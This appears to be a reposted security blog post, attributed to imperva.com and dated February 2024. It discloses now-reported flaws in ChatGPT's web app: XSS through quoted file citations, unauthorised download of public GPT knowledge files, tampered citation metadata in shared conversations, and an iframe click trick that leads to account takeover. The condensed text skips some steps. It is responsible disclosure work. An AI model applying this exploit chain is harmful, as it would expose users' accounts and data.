With its widespread use among businesses and individual users, ChatGPT is a prime target for attackers looking to access sensitive information.
In this blog post, I'll walk you through my discovery of two cross-site scripting vulnerabilities in ChatGPT and a few other vulnerabilities.
Digging into ChatGPT. My journey began with examining ChatGPT's tech stack.
ChatGPT lets users upload files and ask questions about them.
When answering, ChatGPT may quote these files and include a clickable citation icon that takes you back to the original file or website for reference.
It requires the user to upload a harmful file and engage in a way that prompts ChatGPT to quote from this file.
The user needs to click the citation to trigger the XSS. I looked into ChatGPT's feature for sharing conversations as a possible way to make this exploit shareable.
Files uploaded in a ChatGPT conversation are accessible only to the account that uploaded them.
Attempts to access these files from another account resulted in a 404 error.
Through my exploration, I discovered that when a GPT is set to public, it enables any account to access and download these knowledge files, as long as they have the necessary information - specifically, the GPT ID and the associated file ID. I've considered this a Broken Function Level Authorization bug since it allows any ChatGPT user to download public GPT knowledge files.
If I can make the shared conversation request a public file instead of the original uploaded file, it could make the XSS vulnerability exploitable.
To my surprise, ChatGPT accepted this change and continued generating responses as if they were from the assistant.
In this context, I could use input data to manipulate aspects of the ChatGPT application - specifically, the citation metadata - in ways that should ordinarily be off-limits to a regular user.
I created and shared a conversation, and when tested with another ChatGPT account, clicking any citation in the conversation downloaded the knowledge file from my public GPT, which triggered the XSS. I reported this vulnerability to OpenAI. They responded by removing the blob creation and altering the logic to open the download URL directly.
I then broadened my investigation by examining additional functionalities related to how ChatGPT handles the rendering of citations from websites.
ChatGPT allows its interface to be embedded in other websites using an `iframe.
In my proof of concept, I embedded the shared ChatGPT conversation within an `iframe` and used CSS to position it so that any click would inadvertently trigger the citation link.
In our scenario, when a user visited our malicious site that embedded an iframe linking to our ChatGPT shared conversation, these measures would block access to the ChatGPT session cookie and LocalStorage, effectively logging them out of their account within the iframe.
Openai.com, was considered a same-origin request, thus not subject to the typical cross-origin restrictions, enabling the takeover of any ChatGPT account.
It's rewarding to know that our efforts have made ChatGPT more secure for all its users.
This Cyber News was published on www.imperva.com. Publication date: Mon, 19 Feb 2024 14:43:06 +0000